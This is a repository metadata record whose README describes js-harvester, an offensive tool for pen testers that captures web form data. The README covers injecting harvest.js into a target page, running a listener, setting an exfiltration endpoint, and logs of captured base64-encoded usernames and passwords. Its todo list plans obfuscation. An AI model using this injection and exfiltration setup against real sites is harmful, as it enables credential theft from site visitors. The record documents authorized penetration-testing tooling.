{"id":46510996,"url":"https://github.com/toneillcodes/js-harvester","last_synced_at":"2026-03-06T16:07:51.033Z","repository":{"id":255278468,"uuid":"849095614","full_name":"toneillcodes/js-harvester","owner":"toneillcodes","description":"A tool for pen testers \u0026 red team operators to use in an engagement where data must be captured from a web form.","archived":false,"fork":false,"pushed_at":"2025-02-05T03:43:39.000Z","size":68,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-02-05T04:25:28.469Z","etag":null,"topics":["cybersecurity","cybersecurity-tools","offensive-security","pentesting"],"latest_commit_sha":null,"homepage":"","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/toneillcodes.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-08-29T01:04:49.000Z","updated_at":"2025-02-05T03:44:30.000Z","dependencies_parsed_at":"2024-08-29T02:28:12.322Z","dependency_job_id":"fb6208c2-0492-4d0f-b210-5dc637fe60aa","html_url":"https://github.com/toneillcodes/js-harvester","commit_stats":null,"previous_names":["toneillcodes/js-harvester"],"tags_count":1,"template":false,"template_full_name":null,"purl":"pkg:github/toneillcodes/js-harvester","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/toneillcodes%2Fjs-harvester","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/toneillcodes%2Fjs-harvester/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/toneillcodes%2Fjs-harvester/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/toneillcodes%2Fjs-harvester/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/toneillcodes","download_url":"https://codeload.github.com/toneillcodes/js-harvester/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/toneillcodes%2Fjs-harvester/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":30184901,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-06T14:42:24.748Z","status":"ssl_error","status_checked_at":"2026-03-06T14:42:14.925Z","response_time":250,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.6:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cybersecurity","cybersecurity-tools","offensive-security","pentesting"],"created_at":"2026-03-06T16:07:50.322Z","updated_at":"2026-03-06T16:07:51.021Z","avatar_url":"https://github.com/toneillcodes.png","language":"JavaScript","funding_links":[],"categories":[],"sub_categories":[],"readme":"# js-harvester\nThis is a tool for pen testers to use in an engagement where data must be captured from a web form.\n\u003e [!CAUTION]\n\u003e Disclaimer: Intended only for use on systems that you are legally authorized to access.\n# installation\n* Requires jQuery\n* Ability to inject harvest.js to the target site\n# usage\n1. Identify target page to harvest data from (see example-forms for reference/test materials)\n3. Add harvest.js to the target page\n```\n\u003cscript type=\"text/javascript\" src=\"harvest.js\"\u003e\u003c/script\u003e\n```\n4. Run a HTTP or HTTPS service to receive data from the script\n```\n┌──(kali㉿hammer)-[~/tools/js-harvester/server]\n└─$ python -m http.server 8080\nServing HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...\n```\n6. Update the settings in harvest.js\n```\nvar dynamicTrackers = true;\t\t\t//\t(boolean, true/false) \nvar bindAllFormsSwitch = true;\t\t//\t(boolean, true/false)\nvar formName = \"loginform2\";\nvar enableEncoding = true;\t\t\t//\t(boolean, true/false)\nvar usePost = false;\t\t\t\t//\t(boolean, true/false)\nvar trackClients = true;\t\t\t//\t(boolean, true/false)\nvar allowSubmission = false;\t\t//\t(boolean, true/false)\nvar _0x3745 = [\"http\",\"://\",\"127.0.0.1\",\"/harvest.php\",\"Content-type\",\"application/x-www-form-urlencoded\",\"GET\",\"POST\",\"HEAD\",\"PUT\",\"DELETE\",\"OPTIONS\",\"PATCH\"];\n```\n\n* \u003cb\u003edynamicTrackers:\u003c/b\u003e if false, manually update siteId and formId tracking values to unique values\n* \u003cb\u003ebindAllFormsSwitch:\u003c/b\u003e boolean value 'true' or 'false'. true will bind all forms on the page, false will bind the form name specified by 'formName'\n* \u003cb\u003eformName:\u003c/b\u003e required if not binding all forms on the page (see bindAllFormsSwitch)\n* \u003cb\u003eenableEncoding:\u003c/b\u003e enables base64 encoding of exfiltrated data, may expand to other encoding types/formats\n* \u003cb\u003eusePost:\u003c/b\u003e boolean value 'true' or 'false'. indicates whether a POST request should be used for data exfiltration, default is to use GET\n* \u003cb\u003etrackClients:\u003c/b\u003e boolean value 'true' or 'false'. controls whether user client (browser) information is collected\n* \u003cb\u003eallowSubmission:\u003c/b\u003e boolean value 'true' or 'false'. allows (true) or disables (false) the form submission function on target forms\n* \u003cb\u003e_0x3745:\u003c/b\u003e array of values used for data exfiltration, the first 4 need to be customized for the data exfiltration endpoint\n\n5. Listen. . .\n```\n┌──(kali㉿hammer)-[~/tools/js-harvester/server]\n└─$ python -m http.server 8080\nServing HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...\n192.168.1.211 - - [14/Sep/2024 18:39:22] \"GET /harvest?data=dXNlcm5hbWU6cGV0ZXImcGFzc3dvcmQ6d2VpbmVyJnNpdGVJZDpNVGt5TGpFMk9DNHhMakl6Tnc9PSZmb3JtSWQ6TDJwemFHRnlkbVZ6ZEM5c2IyZHBiaTFtYjNKdExtaDBiV3d0Ykc5bmFXNW1iM0p0 HTTP/1.1\" 200 -\n192.168.1.211 - - [14/Sep/2024 18:39:27] \"GET /harvest?data=dXNlcm5hbWU6YWRtaW4mcGFzc3dvcmQ6YWRtaW4mc2l0ZUlkOk1Ua3lMakUyT0M0eExqSXpOdz09JmZvcm1JZDpMMnB6YUdGeWRtVnpkQzlzYjJkcGJpMW1iM0p0TG1oMGJXd3RiRzluYVc1bWIzSnQ= HTTP/1.1\" 200 -\n192.168.1.211 - - [14/Sep/2024 18:39:33] \"GET /harvest?data=dXNlcm5hbWU6Z2VvcmdlJnBhc3N3b3JkOmJ1cm5zJnNpdGVJZDpNVGt5TGpFMk9DNHhMakl6Tnc9PSZmb3JtSWQ6TDJwemFHRnlkbVZ6ZEM5c2IyZHBiaTFtYjNKdExtaDBiV3d0Ykc5bmFXNW1iM0p0 HTTP/1.1\" 200 -\n^C\nKeyboard interrupt received, exiting.\n \n┌──(kali㉿hammer)-[~/tools/js-harvester/server]\n└─$ \n```\n\n# todo list\n* ~~dynamic form binding and processing~~\n* ~~support for exfiltration through configurable HTTP methods~~\n* ~~use hash values to identify site and form IDs~~\n* ~~ability to bind multiple forms dynamically~~\n* client feedback options\n* enhance decoder tools\n* change form processing to avoid using name or id properties\n* collect client information\n* customizable serialization separators\n* code obfuscation\n* obfuscation for data exfiltration\n* remove jQuery dependencies\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ftoneillcodes%2Fjs-harvester","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Ftoneillcodes%2Fjs-harvester","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ftoneillcodes%2Fjs-harvester/lists"}